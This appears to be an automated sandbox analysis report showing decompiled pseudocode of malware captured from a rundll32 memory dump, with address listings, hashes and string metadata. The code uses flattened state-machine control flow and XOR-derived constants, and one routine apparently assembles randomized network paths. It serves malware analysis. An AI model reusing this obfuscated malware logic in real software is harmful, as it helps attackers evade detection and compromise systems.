                                                                      				 *(_t903 + 0x1c) =  *(_t903 + 0x1c) + 0xffff2328;
                                                                      				 *(_t903 + 0x1c) =  *(_t903 + 0x1c) ^ 0xd7cef55f;
                                                                      				 *(_t903 + 0x78) = 0x4f9e;
                                                                      				 *(_t903 + 0x78) =  *(_t903 + 0x78) >> 0xf;
                                                                      				_t790 = 0xe;
                                                                      				 *(_t903 + 0x74) =  *(_t903 + 0x78) / _t790;
                                                                      				 *(_t903 + 0x74) =  *(_t903 + 0x74) ^ 0x00003e82;
                                                                      				 *(_t903 + 0x38) = 0xf8c3;
                                                                      				 *(_t903 + 0x38) =  *(_t903 + 0x38) + 0xffff0aba;
                                                                      				 *(_t903 + 0x38) =  *(_t903 + 0x38) + 0xffff96d9;
                                                                      				 *(_t903 + 0x38) =  *(_t903 + 0x38) * 0x36;
                                                                      				 *(_t903 + 0x38) =  *(_t903 + 0x38) ^ 0xffea86cf;
                                                                      				 *(_t903 + 0xe8) = 0x47de;
                                                                      				 *(_t903 + 0xe8) =  *(_t903 + 0xe8) ^ 0xd4f8af4a;
                                                                      				 *(_t903 + 0xe8) =  *(_t903 + 0xe8) ^ 0xd4f89eb4;
                                                                      				 *(_t903 + 0x20) = 0x65fb;
                                                                      				 *(_t903 + 0x20) =  *(_t903 + 0x20) >> 7;
                                                                      				 *(_t903 + 0x20) =  *(_t903 + 0x20) + 0xfffffa8d;
                                                                      				 *(_t903 + 0x20) =  *(_t903 + 0x20) * 0x56;
                                                                      				 *(_t903 + 0x20) =  *(_t903 + 0x20) ^ 0xfffe5494;
                                                                      				 *(_t903 + 0x6c) = 0x64ca;
                                                                      				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) + 0xffff11ba;
                                                                      				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) + 0xc430;
                                                                      				 *(_t903 + 0x6c) =  *(_t903 + 0x6c) ^ 0x00005014;
                                                                      				 *(_t903 + 0xa0) = 0x1b33;
                                                                      				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) * 0x6c;
                                                                      				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) | 0x1aa81449;
                                                                      				 *(_t903 + 0xa0) =  *(_t903 + 0xa0) ^ 0x1aab14e6;
                                                                      				 *(_t903 + 0x108) = 0x9e77;
                                                                      				 *(_t903 + 0x108) =  *(_t903 + 0x108) | 0xd713dbbf;
                                                                      				 *(_t903 + 0x108) =  *(_t903 + 0x108) ^ 0xd713a936;
                                                                      				 *(_t903 + 0xf0) = 0x6078;
                                                                      				 *(_t903 + 0xf0) =  *(_t903 + 0xf0) + 0xb979;
                                                                      				 *(_t903 + 0xf0) =  *(_t903 + 0xf0) ^ 0x00014992;
                                                                      				 *(_t903 + 0xe4) = 0x5404;
                                                                      				 *(_t903 + 0xe4) =  *(_t903 + 0xe4) ^ 0x58bc0909;
                                                                      				 *(_t903 + 0xe4) =  *(_t903 + 0xe4) ^ 0x58bc1b10;
                                                                      				 *(_t903 + 0xdc) = 0xf7f;
                                                                      				 *(_t903 + 0xdc) =  *(_t903 + 0xdc) >> 0xd;
                                                                      				 *(_t903 + 0xdc) =  *(_t903 + 0xdc) ^ 0x00005966;
                                                                      				 *(_t903 + 0x64) = 0xb834;
                                                                      				 *(_t903 + 0x64) =  *(_t903 + 0x64) << 1;
                                                                      				 *(_t903 + 0x64) =  *(_t903 + 0x64) >> 0x10;
                                                                      				 *(_t903 + 0x64) =  *(_t903 + 0x64) >> 1;
                                                                      				 *(_t903 + 0x64) =  *(_t903 + 0x64) ^ 0x00004c5c;
                                                                      				 *(_t903 + 0xd4) = 0x4bcc;
                                                                      				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) * 0x53;
                                                                      				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) ^ 0x69196900;
                                                                      				 *(_t903 + 0xd4) =  *(_t903 + 0xd4) ^ 0x69018755;
                                                                      				 *(_t903 + 0x84) = 0xe13c;
                                                                      				 *(_t903 + 0x84) =  *(_t903 + 0x84) ^ 0x2f0c4ec9;
                                                                      				 *(_t903 + 0x84) =  *(_t903 + 0x84) ^ 0x8c1dd645;
                                                                      				 *(_t903 + 0x84) =  *(_t903 + 0x84) ^ 0xa31179b0;
                                                                      				_t791 =  *((intOrPtr*)(_t903 + 0x130));
                                                                      				 *((intOrPtr*)(_t903 + 0x10)) =  *((intOrPtr*)(_t903 + 0x134));
                                                                      				 *((intOrPtr*)(_t903 + 0x12c)) = _t791;
                                                                      				while(1) {
                                                                      					L1:
                                                                      					_t865 =  *(_t903 + 0x14);
                                                                      					while(1) {
                                                                      						L2:
                                                                      						_t908 = _t795 - 0x1ac77ed3;
                                                                      						if(_t908 > 0) {
                                                                      							goto L30;
                                                                      						}
                                                                      						L3:
                                                                      						if(_t908 == 0) {
                                                                      							_t890 = _t903 + 0x260;
                                                                      							_t811 = 6;
                                                                      							_t901 =  *(_t903 + 0x124) % _t811 + 1;
                                                                      							__eflags = _t901;
                                                                      							if(__eflags != 0) {
                                                                      								__eflags = 1;
                                                                      								do {
                                                                      									_t897 = ( *(_t903 + 0x128) & 0x0000000f) + 4;
                                                                      									E0200087B(_t890,  *((intOrPtr*)(_t903 + 0x130)),  *(_t903 + 0x90), _t897,  *((intOrPtr*)(_t903 + 0x4c)), 1, _t903 + 0x128,  *(_t903 + 0xf8));
                                                                      									_t903 = _t903 + 0x18;
                                                                      									_t891 = _t890 + _t897 * 2;
                                                                      									_t775 = 0x2f;
                                                                      									 *_t891 = _t775;
                                                                      									_t890 = _t891 + 2;
                                                                      									_t901 = _t901 - 1;
                                                                      									__eflags = _t901;
                                                                      								} while (__eflags != 0);
                                                                      								_t791 =  *((intOrPtr*)(_t903 + 0x12c));
                                                                      								_t892 =  *(_t903 + 0x120);
                                                                      							}
                                                                      							_t899 =  *(_t903 + 0x128);
                                                                      							 *_t890 = 0;
                                                                      							_t795 = 0x1da9be04;
                                                                      							_t720 =  *((intOrPtr*)(_t903 + 0x10));
                                                                      							_t889 =  *(_t903 + 0x140);
                                                                      							goto L1;
                                                                      						} else {
                                                                      							_t909 = _t795 - 0x109a2717;
                                                                      							if(_t909 > 0) {
                                                                      								__eflags = _t795 - 0x11ab6705;
                                                                      								if(_t795 == 0x11ab6705) {
                                                                      									_push(_t903 + 0x138);
                                                                      									_push( *(_t903 + 0x3c));
                                                                      									_push(_t892);
                                                                      									_t741 = E01FFF9BA( *(_t903 + 0x7c));
                                                                      									_t903 = _t903 + 0xc;
                                                                      									_t795 = 0xcf94e74;
                                                                      									__eflags = _t741;
                                                                      									_t742 = 1;
                                                                      									_t899 =  !=  ? _t742 : _t899;
                                                                      									 *(_t903 + 0x128) = _t899;
                                                                      									goto L16;
                                                                      								} else {
                                                                      									__eflags = _t795 - 0x13f4272a;
                                                                      									if(_t795 == 0x13f4272a) {
                                                                      										E01FFDE81( *((intOrPtr*)(_t903 + 0x10c)),  *((intOrPtr*)(_t903 + 0x148)),  *(_t903 + 0xf0));
                                                                      										_t795 = 0x1d56e0a8;
                                                                      										goto L16;
                                                                      									} else {
                                                                      										__eflags = _t795 - 0x158b14ad;
                                                                      										if(_t795 != 0x158b14ad) {
                                                                      											goto L44;
                                                                      										} else {
                                                                      											E01FFDE81( *((intOrPtr*)(_t903 + 0x70)),  *((intOrPtr*)(_t903 + 0x150)),  *(_t903 + 0xa0));
                                                                      											_t795 = 0x13f4272a;
                                                                      											goto L16;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							} else {
                                                                      								if(_t909 == 0) {
                                                                      									_push(0x1ff14fc);
                                                                      									_push( *(_t903 + 0x84));
                                                                      									_push( *(_t903 + 0x68));
                                                                      									_t745 = E01FF5DFC( *(_t903 + 0xcc),  *(_t903 + 0x34), __eflags);
                                                                      									_t905 = _t903 + 0xc;
                                                                      									_t881 =  *( *0x201108c + 0x24);
                                                                      									_push(_t881[3] & 0x000000ff);
                                                                      									_push(_t745);
                                                                      									_push(_t881[1] & 0x000000ff);
                                                                      									_push( *_t881 & 0x000000ff);
                                                                      									_push( *((intOrPtr*)(_t905 + 0x12c)));
                                                                      									_push( *((intOrPtr*)(_t905 + 0x5c)));
                                                                      									_push(( *( *0x201108c + 0x24))[2] & 0x000000ff);
                                                                      									_push( *((intOrPtr*)(_t905 + 0xa4)));
                                                                      									_push( *((intOrPtr*)(_t905 + 0x50)));
                                                                      									_push( *((intOrPtr*)(_t905 + 0xd4)));
                                                                      									_push( *((intOrPtr*)(_t905 + 0x80)));
                                                                      									_push( *((intOrPtr*)(_t905 + 0xbc)));
                                                                      									_t882 = 0x40;
                                                                      									E01FF98C5(_t882, __eflags);
                                                                      									E02000D6D( *((intOrPtr*)(_t905 + 0xf0)),  *((intOrPtr*)(_t905 + 0xd0)),  *((intOrPtr*)(_t905 + 0x104)), _t745);
                                                                      									_t903 = _t905 + 0x38;
                                                                      									_t795 = 0x1ac77ed3;
                                                                      									_t865 = ( *( *0x201108c + 0x24))[4] & 0x0000ffff;
                                                                      									_t720 =  *((intOrPtr*)(_t903 + 0x10));
                                                                      									 *(_t903 + 0x14) = ( *( *0x201108c + 0x24))[4] & 0x0000ffff;
                                                                      									goto L14;
                                                                      								} else {
                                                                      									if(_t795 == 0xb3bcfc8) {
                                                                      										E02007187(_t903 + 0x148, _t903 + 0x1e4, _t903 + 0x14c);
                                                                      										_pop(_t826);
                                                                      										asm("sbb ecx, ecx");
                                                                      										_t795 = (_t826 & 0x278b1eba) + 0x13f4272a;
                                                                      										goto L16;
                                                                      									} else {
                                                                      										if(_t795 == 0xc2454b8) {
                                                                      											_push( *(_t903 + 0xd4));
                                                                      											_t828 =  *(_t903 + 0x68);
                                                                      											goto L48;
                                                                      										} else {
                                                                      											if(_t795 == 0xcf94e74) {
                                                                      												E01FFDE81( *((intOrPtr*)(_t903 + 0xec)),  *(_t903 + 0x13c),  *(_t903 + 0x20));
                                                                      												_t795 = 0x158b14ad;
                                                                      												L16:
                                                                      												_t720 =  *((intOrPtr*)(_t903 + 0x10));
                                                                      												while(1) {
                                                                      													L1:
                                                                      													_t865 =  *(_t903 + 0x14);
                                                                      													goto L2;
                                                                      												}
                                                                      											} else {
                                                                      												if(_t795 != 0xdea8839) {
                                                                      													L44:
                                                                      													__eflags = _t795 - 0x32f4d51e;
                                                                      													if(__eflags != 0) {
                                                                      														while(1) {
                                                                      															L1:
                                                                      															_t865 =  *(_t903 + 0x14);
                                                                      															goto L2;
                                                                      														}
                                                                      													}
                                                                      												} else {
                                                                      													_push(_t795);
                                                                      													_push( *((intOrPtr*)(_t889 + 4)));
                                                                      													_t894 = E01FFA143(_t795);
                                                                      													_t906 = _t903 + 8;
                                                                      													_t791 = E01FF54FB(_t762);
                                                                      													 *((intOrPtr*)(_t906 + 0x130)) = _t791;
                                                                      													_t914 = _t791;
                                                                      													if(_t791 != 0) {
                                                                      														_t720 = E01FF5418( *((intOrPtr*)(_t906 + 0xe8)),  *((intOrPtr*)(_t906 + 0xf0)), _t914, _t894,  *((intOrPtr*)(_t906 + 0xb4)),  *_t889,  *((intOrPtr*)(_t889 + 4)), _t791);
                                                                      														_t903 = _t906 + 0x14;
                                                                      														 *((intOrPtr*)(_t903 + 0x10)) = _t720;
                                                                      														if(_t720 == 0) {
                                                                      															_push( *(_t903 + 0x54));
                                                                      															_t828 =  *(_t903 + 0x60);
                                                                      															L48:
                                                                      															E01FFDE81(_t828, _t791);
                                                                      														} else {
                                                                      															_t795 = 0x37dee1aa;
                                                                      															L13:
                                                                      															_t865 =  *(_t903 + 0x14);
                                                                      															L14:
                                                                      															_t892 =  *(_t903 + 0x120);
                                                                      															L2:
                                                                      															_t908 = _t795 - 0x1ac77ed3;
                                                                      															if(_t908 > 0) {
                                                                      																goto L30;
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L49:
                                                                      						return _t899;
                                                                      						L30:
                                                                      						__eflags = _t795 - 0x1d56e0a8;
                                                                      						if(_t795 == 0x1d56e0a8) {
                                                                      							E01FFDE81( *(_t903 + 0xe8),  *((intOrPtr*)(_t903 + 0x134)),  *(_t903 + 0xdc));
                                                                      							_t795 = 0xc2454b8;
                                                                      							goto L44;
                                                                      						} else {
                                                                      							__eflags = _t795 - 0x1da9be04;
                                                                      							if(__eflags == 0) {
                                                                      								E02008A33(_t903 + 0x1e0, _t889, __eflags);
                                                                      								_t795 = 0x2ba7081d;
                                                                      								goto L16;
                                                                      							} else {
                                                                      								__eflags = _t795 - 0x2392656c;
                                                                      								if(_t795 == 0x2392656c) {
                                                                      									 *(_t903 + 0x124) = E01FFA156();
                                                                      									_t795 = 0xdea8839;
                                                                      									goto L16;
                                                                      								} else {
                                                                      									__eflags = _t795 - 0x2b46f7ec;
                                                                      									if(_t795 == 0x2b46f7ec) {
                                                                      										E0200AA7B(_t903 + 0x138,  *(_t903 + 0xcc),  *(_t903 + 0x110), _t903 + 0x144);
                                                                      										_pop(_t801);
                                                                      										asm("sbb ecx, ecx");
                                                                      										_t795 = (_t801 & 0xf343466f) + 0x1d56e0a8;
                                                                      										goto L16;
                                                                      									} else {
                                                                      										__eflags = _t795 - 0x2ba7081d;
                                                                      										if(__eflags == 0) {
                                                                      											_push(0x1ff154c);
                                                                      											_push( *(_t903 + 0x108));
                                                                      											_push( *((intOrPtr*)(_t903 + 0xa4)));
                                                                      											_t726 = E01FF5DFC( *(_t903 + 0x38),  *(_t903 + 0xb0), __eflags);
                                                                      											_t904 = _t903 + 0xc;
                                                                      											E0200BAEC(0x400, __eflags,  *((intOrPtr*)(_t904 + 0xd0)), _t726, _t904 + 0x270,  *((intOrPtr*)(_t904 + 0xbc)),  *((intOrPtr*)(_t904 + 0x40)), _t904 + 0x468, _t904 + 0x1e4, _t904 + 0x160);
                                                                      											E02000D6D( *((intOrPtr*)(_t904 + 0xe4)),  *((intOrPtr*)(_t904 + 0x74)),  *((intOrPtr*)(_t904 + 0x68)), _t726);
                                                                      											_t720 =  *((intOrPtr*)(_t904 + 0x38));
                                                                      											_t903 = _t904 + 0x28;
                                                                      											_t795 = 0xb3bcfc8;
                                                                      											goto L13;
                                                                      										} else {
                                                                      											__eflags = _t795 - 0x37dee1aa;
                                                                      											if(_t795 == 0x37dee1aa) {
                                                                      												 *((intOrPtr*)(_t903 + 0x160)) = _t720;
                                                                      												 *((intOrPtr*)(_t903 + 0x15c)) =  *((intOrPtr*)(_t903 + 0xc68));
                                                                      												_t807 =  *(_t903 + 0x104);
                                                                      												 *((intOrPtr*)(_t903 + 0x164)) = _t791;
                                                                      												E01FF7B39(_t807,  *(_t903 + 0x98), _t903 + 0x15c, _t903 + 0x134,  *((intOrPtr*)(_t903 + 0xf4)));
                                                                      												_t903 = _t903 + 0xc;
                                                                      												asm("sbb ecx, ecx");
                                                                      												_t795 = (_t807 & 0x1f22a334) + 0xc2454b8;
                                                                      												goto L16;
                                                                      											} else {
                                                                      												__eflags = _t795 - 0x3b7f45e4;
                                                                      												if(_t795 != 0x3b7f45e4) {
                                                                      													goto L44;
                                                                      												} else {
                                                                      													 *(_t903 + 0x13c) =  *(_t903 + 0x13c) & 0x00000000;
                                                                      													 *(_t903 + 0x140) =  *(_t903 + 0x84);
                                                                      													_t809 =  *(_t903 + 0x110);
                                                                      													E02007BBE(_t903 + 0x488, _t903 + 0x15c,  *((intOrPtr*)(_t903 + 0x130)), _t903 + 0x27c, _t865, _t903 + 0x158,  *(_t903 + 0x78),  *(_t903 + 0x30),  *((intOrPtr*)(_t903 + 0x24)), _t903 + 0x164,  *(_t903 + 0x100));
                                                                      													_t903 = _t903 + 0x28;
                                                                      													asm("sbb ecx, ecx");
                                                                      													_t795 = (_t809 & 0xfc205258) + 0x158b14ad;
                                                                      													goto L16;
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						goto L49;
                                                                      					}
                                                                      				}
                                                                      			}
                                                                      0x01ff8177
                                                                      0x01ff8182
                                                                      0x01ff818d
                                                                      0x01ff8198
                                                                      0x01ff81a3
                                                                      0x01ff81b6
                                                                      0x01ff81b7
                                                                      0x01ff81be
                                                                      0x01ff81c6
                                                                      0x01ff81d1
                                                                      0x01ff81d9
                                                                      0x01ff81de
                                                                      0x01ff81ec
                                                                      0x01ff81f0
                                                                      0x01ff81f8
                                                                      0x01ff8205
                                                                      0x01ff8211
                                                                      0x01ff8216
                                                                      0x01ff821c
                                                                      0x01ff8224
                                                                      0x01ff822c
                                                                      0x01ff8237
                                                                      0x01ff823e
                                                                      0x01ff8249
                                                                      0x01ff8254
                                                                      0x01ff825c
                                                                      0x01ff8267
                                                                      0x01ff8272
                                                                      0x01ff827d
                                                                      0x01ff8288
                                                                      0x01ff8293
                                                                      0x01ff829e
                                                                      0x01ff82a9
                                                                      0x01ff82b1
                                                                      0x01ff82bc
                                                                      0x01ff82c7
                                                                      0x01ff82d2
                                                                      0x01ff82dd
                                                                      0x01ff82ef
                                                                      0x01ff82f4
                                                                      0x01ff8305
                                                                      0x01ff8306
                                                                      0x01ff830d
                                                                      0x01ff8318
                                                                      0x01ff8320
                                                                      0x01ff8328
                                                                      0x01ff832d
                                                                      0x01ff8331
                                                                      0x01ff8339
                                                                      0x01ff8341
                                                                      0x01ff8346
                                                                      0x01ff834b
                                                                      0x01ff8353
                                                                      0x01ff835b
                                                                      0x01ff8366
                                                                      0x01ff836e
                                                                      0x01ff8379
                                                                      0x01ff8384
                                                                      0x01ff838f
                                                                      0x01ff8397
                                                                      0x01ff839f
                                                                      0x01ff83aa
                                                                      0x01ff83b2
                                                                      0x01ff83ba
                                                                      0x01ff83c2
                                                                      0x01ff83c7
                                                                      0x01ff83cf
                                                                      0x01ff83da
                                                                      0x01ff83e5
                                                                      0x01ff83f0
                                                                      0x01ff83fb
                                                                      0x01ff8403
                                                                      0x01ff8411
                                                                      0x01ff8415
                                                                      0x01ff841d
                                                                      0x01ff8425
                                                                      0x01ff8430
                                                                      0x01ff8438
                                                                      0x01ff8443
                                                                      0x01ff844e
                                                                      0x01ff8456
                                                                      0x01ff845e
                                                                      0x01ff8466
                                                                      0x01ff846b
                                                                      0x01ff8473
                                                                      0x01ff8489
                                                                      0x01ff848e
                                                                      0x01ff8497
                                                                      0x01ff84a2
                                                                      0x01ff84ad
                                                                      0x01ff84b8
                                                                      0x01ff84c3
                                                                      0x01ff84ce
                                                                      0x01ff84d9
                                                                      0x01ff84e4
                                                                      0x01ff84ec
                                                                      0x01ff84f7
                                                                      0x01ff8502
                                                                      0x01ff850d
                                                                      0x01ff8515
                                                                      0x01ff8520
                                                                      0x01ff8533
                                                                      0x01ff8536
                                                                      0x01ff853d
                                                                      0x01ff8548
                                                                      0x01ff8553
                                                                      0x01ff8566
                                                                      0x01ff856d
                                                                      0x01ff8578
                                                                      0x01ff8580
                                                                      0x01ff8588
                                                                      0x01ff8590
                                                                      0x01ff8598
                                                                      0x01ff85a0
                                                                      0x01ff85b6
                                                                      0x01ff85bd
                                                                      0x01ff85c8
                                                                      0x01ff85d0
                                                                      0x01ff85d8
                                                                      0x01ff85dd
                                                                      0x01ff85e2
                                                                      0x01ff85ea
                                                                      0x01ff85f5
                                                                      0x01ff8600
                                                                      0x01ff8608
                                                                      0x01ff8613
                                                                      0x01ff861e
                                                                      0x01ff8630
                                                                      0x01ff8635
                                                                      0x01ff863e
                                                                      0x01ff8649
                                                                      0x01ff8654
                                                                      0x01ff865c
                                                                      0x01ff8667
                                                                      0x01ff866f
                                                                      0x01ff8677
                                                                      0x01ff8681
                                                                      0x01ff8682
                                                                      0x01ff8686
                                                                      0x01ff868e
                                                                      0x01ff86a2
                                                                      0x01ff86a9
                                                                      0x01ff86b4
                                                                      0x01ff86bf
                                                                      0x01ff86ca
                                                                      0x01ff86d5
                                                                      0x01ff86e0
                                                                      0x01ff86ed
                                                                      0x01ff86fc
                                                                      0x01ff86ff
                                                                      0x01ff8703
                                                                      0x01ff8710
                                                                      0x01ff8714
                                                                      0x01ff871c
                                                                      0x01ff8727
                                                                      0x01ff873d
                                                                      0x01ff8744
                                                                      0x01ff874f
                                                                      0x01ff875b
                                                                      0x01ff8760
                                                                      0x01ff8766
                                                                      0x01ff8770
                                                                      0x01ff8773
                                                                      0x01ff8777
                                                                      0x01ff877f
                                                                      0x01ff8787
                                                                      0x01ff878f
                                                                      0x01ff879f
                                                                      0x01ff87a3
                                                                      0x01ff87ab
                                                                      0x01ff87b6
                                                                      0x01ff87be
                                                                      0x01ff87c9
                                                                      0x01ff87d4
                                                                      0x01ff87df
                                                                      0x01ff87ea
                                                                      0x01ff87f6
                                                                      0x01ff87fb
                                                                      0x01ff8801
                                                                      0x01ff8809
                                                                      0x01ff8811
                                                                      0x01ff8819
                                                                      0x01ff8821
                                                                      0x01ff8829
                                                                      0x01ff882e
                                                                      0x01ff8836
                                                                      0x01ff883e
                                                                      0x01ff8846
                                                                      0x01ff884b
                                                                      0x01ff8850
                                                                      0x01ff8858
                                                                      0x01ff8863
                                                                      0x01ff886b
                                                                      0x01ff8876
                                                                      0x01ff887e
                                                                      0x01ff8886
                                                                      0x01ff888e
                                                                      0x01ff8896
                                                                      0x01ff889e
                                                                      0x01ff88a6
                                                                      0x01ff88af
                                                                      0x01ff88b2
                                                                      0x01ff88b6
                                                                      0x01ff88be
                                                                      0x01ff88c6
                                                                      0x01ff88ce
                                                                      0x01ff88db
                                                                      0x01ff88df
                                                                      0x01ff88e7
                                                                      0x01ff88f2
                                                                      0x01ff88fd
                                                                      0x01ff8908
                                                                      0x01ff8910
                                                                      0x01ff8915
                                                                      0x01ff8922
                                                                      0x01ff8926
                                                                      0x01ff892e
                                                                      0x01ff8936
                                                                      0x01ff893e
                                                                      0x01ff8946
                                                                      0x01ff894e
                                                                      0x01ff8961
                                                                      0x01ff8968
                                                                      0x01ff8973
                                                                      0x01ff897e
                                                                      0x01ff8989
                                                                      0x01ff8994
                                                                      0x01ff899f
                                                                      0x01ff89aa
                                                                      0x01ff89b5
                                                                      0x01ff89c0
                                                                      0x01ff89cb
                                                                      0x01ff89d6
                                                                      0x01ff89e1
                                                                      0x01ff89ec
                                                                      0x01ff89f4
                                                                      0x01ff89ff
                                                                      0x01ff8a07
                                                                      0x01ff8a0b
                                                                      0x01ff8a10
                                                                      0x01ff8a14
                                                                      0x01ff8a1c
                                                                      0x01ff8a2f
                                                                      0x01ff8a36
                                                                      0x01ff8a41
                                                                      0x01ff8a4c
                                                                      0x01ff8a57
                                                                      0x01ff8a62
                                                                      0x01ff8a6d
                                                                      0x01ff8a7f
                                                                      0x01ff8a86
                                                                      0x01ff8a8a
                                                                      0x01ff8a91
                                                                      0x01ff8a91
                                                                      0x01ff8a91
                                                                      0x01ff8a95
                                                                      0x01ff8a95
                                                                      0x01ff8a95
                                                                      0x01ff8a9b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ff8aa1
                                                                      0x01ff8aa1
                                                                      0x01ff8d2c
                                                                      0x01ff8d37
                                                                      0x01ff8d3c
                                                                      0x01ff8d3c
                                                                      0x01ff8d3d
                                                                      0x01ff8d41
                                                                      0x01ff8d42
                                                                      0x01ff8d62
                                                                      0x01ff8d74
                                                                      0x01ff8d79
                                                                      0x01ff8d7c
                                                                      0x01ff8d81
                                                                      0x01ff8d82
                                                                      0x01ff8d85
                                                                      0x01ff8d88
                                                                      0x01ff8d88
                                                                      0x01ff8d88
                                                                      0x01ff8d8b
                                                                      0x01ff8d92
                                                                      0x01ff8d92
                                                                      0x01ff8d99
                                                                      0x01ff8da2
                                                                      0x01ff8da5
                                                                      0x01ff8daa
                                                                      0x01ff8dae
                                                                      0x00000000
                                                                      0x01ff8aa7
                                                                      0x01ff8aac
                                                                      0x01ff8aae
                                                                      0x01ff8c8c
                                                                      0x01ff8c92
                                                                      0x01ff8cf6
                                                                      0x01ff8cf7
                                                                      0x01ff8d03
                                                                      0x01ff8d04
                                                                      0x01ff8d09
                                                                      0x01ff8d0c
                                                                      0x01ff8d11
                                                                      0x01ff8d15
                                                                      0x01ff8d16
                                                                      0x01ff8d19
                                                                      0x00000000
                                                                      0x01ff8c94
                                                                      0x01ff8c94
                                                                      0x01ff8c9a
                                                                      0x01ff8cdf
                                                                      0x01ff8ce5
                                                                      0x00000000
                                                                      0x01ff8c9c
                                                                      0x01ff8c9c
                                                                      0x01ff8ca2
                                                                      0x00000000
                                                                      0x01ff8ca8
                                                                      0x01ff8cba
                                                                      0x01ff8cc0
                                                                      0x00000000
                                                                      0x01ff8cc0
                                                                      0x01ff8ca2
                                                                      0x01ff8c9a
                                                                      0x01ff8ab4
                                                                      0x01ff8ab4
                                                                      0x01ff8bcc
                                                                      0x01ff8bd1
                                                                      0x01ff8bd8
                                                                      0x01ff8be7
                                                                      0x01ff8bf2
                                                                      0x01ff8bf7
                                                                      0x01ff8bfe
                                                                      0x01ff8c03
                                                                      0x01ff8c04
                                                                      0x01ff8c08
                                                                      0x01ff8c09
                                                                      0x01ff8c17
                                                                      0x01ff8c27
                                                                      0x01ff8c28
                                                                      0x01ff8c2f
                                                                      0x01ff8c33
                                                                      0x01ff8c3a
                                                                      0x01ff8c41
                                                                      0x01ff8c4a
                                                                      0x01ff8c4b
                                                                      0x01ff8c66
                                                                      0x01ff8c70

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #$$Uf.$7$<$BT$D2$\L$\|$fY$h.$hW$jg$l}$mb$ti$vj$x+-$x`${$$F$P$T$W$n
                                                                      • API String ID: 0-3542471488
                                                                      • Opcode ID: ca5851d928ab7d871b40e7a895bd611007882e3c4dc7b0fb4f71945d2e41ba98
                                                                      • Instruction ID: a36553f013968eca36fee90c175f19d8384ed6a27b7d064cdc547df7280d608b
                                                                      • Opcode Fuzzy Hash: ca5851d928ab7d871b40e7a895bd611007882e3c4dc7b0fb4f71945d2e41ba98
                                                                      • Instruction Fuzzy Hash: 84820271509385CBE378CF25C889B9FBBE1BF84344F108A1DE2C9862A0D7B59945CF52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E01FF1806() {
                                                                      				char _v520;
                                                                      				char _v1040;
                                                                      				char _v1560;
                                                                      				signed int _v1564;
                                                                      				signed int _v1568;
                                                                      				signed int _v1572;
                                                                      				intOrPtr* _v1576;
                                                                      				signed int _v1580;
                                                                      				signed int _v1584;
                                                                      				signed int _v1588;
                                                                      				signed int _v1592;
                                                                      				signed int _v1596;
                                                                      				signed int _v1600;
                                                                      				unsigned int _v1604;
                                                                      				signed int _v1608;
                                                                      				signed int _v1612;
                                                                      				signed int _v1616;
                                                                      				signed int _v1620;
                                                                      				signed int _v1624;
                                                                      				signed int _v1628;
                                                                      				signed int _v1632;
                                                                      				signed int _v1636;
                                                                      				signed int _v1640;
                                                                      				signed int _v1644;
                                                                      				signed int _v1648;
                                                                      				signed int _v1652;
                                                                      				signed int _v1656;
                                                                      				signed int _v1660;
                                                                      				signed int _v1664;
                                                                      				signed int _v1668;
                                                                      				signed int _v1672;
                                                                      				signed int _v1676;
                                                                      				signed int _v1680;
                                                                      				signed int _v1684;
                                                                      				signed int _v1688;
                                                                      				signed int _v1692;
                                                                      				signed int _v1696;
                                                                      				signed int _v1700;
                                                                      				signed int _v1704;
                                                                      				signed int _v1708;
                                                                      				signed int _v1712;
                                                                      				signed int _v1716;
                                                                      				signed int _v1720;
                                                                      				signed int _v1724;
                                                                      				signed int _v1728;
                                                                      				signed int _v1732;
                                                                      				signed int _v1736;
                                                                      				signed int _v1740;
                                                                      				signed int _v1744;
                                                                      				signed int _v1748;
                                                                      				signed int _v1752;
                                                                      				signed int _v1756;
                                                                      				void* _t499;
                                                                      				intOrPtr _t511;
                                                                      				intOrPtr* _t513;
                                                                      				void* _t516;
                                                                      				void* _t554;
                                                                      				signed int _t563;
                                                                      				signed int _t564;
                                                                      				signed int _t565;
                                                                      				signed int _t566;
                                                                      				signed int _t567;
                                                                      				signed int _t568;
                                                                      				signed int _t569;
                                                                      				signed int _t570;
                                                                      				signed int _t571;
                                                                      				signed int _t572;
                                                                      				signed int _t573;
                                                                      				signed int _t574;
                                                                      				signed int _t575;
                                                                      				intOrPtr* _t578;
                                                                      				intOrPtr* _t579;
                                                                      				signed int* _t583;
                                                                      				void* _t586;
                                                                      
                                                                      				_t583 =  &_v1756;
                                                                      				_v1600 = 0xf170;
                                                                      				_v1600 = _v1600 + 0xda8c;
                                                                      				_t516 = 0x23fcadf5;
                                                                      				_v1600 = _v1600 ^ 0x0001cbd5;
                                                                      				_v1728 = 0xe67a;
                                                                      				_t563 = 0x31;
                                                                      				_v1728 = _v1728 / _t563;
                                                                      				_v1728 = _v1728 | 0x44845457;
                                                                      				_t579 = 0;
                                                                      				_v1728 = _v1728 + 0xffff77e0;
                                                                      				_v1728 = _v1728 ^ 0x4483eb2a;
                                                                      				_v1612 = 0x5383;
                                                                      				_t564 = 0x6e;
                                                                      				_v1612 = _v1612 / _t564;
                                                                      				_v1612 = _v1612 << 4;
                                                                      				_v1612 = _v1612 ^ 0x00005321;
                                                                      				_v1644 = 0x68ec;
                                                                      				_v1644 = _v1644 >> 0xe;
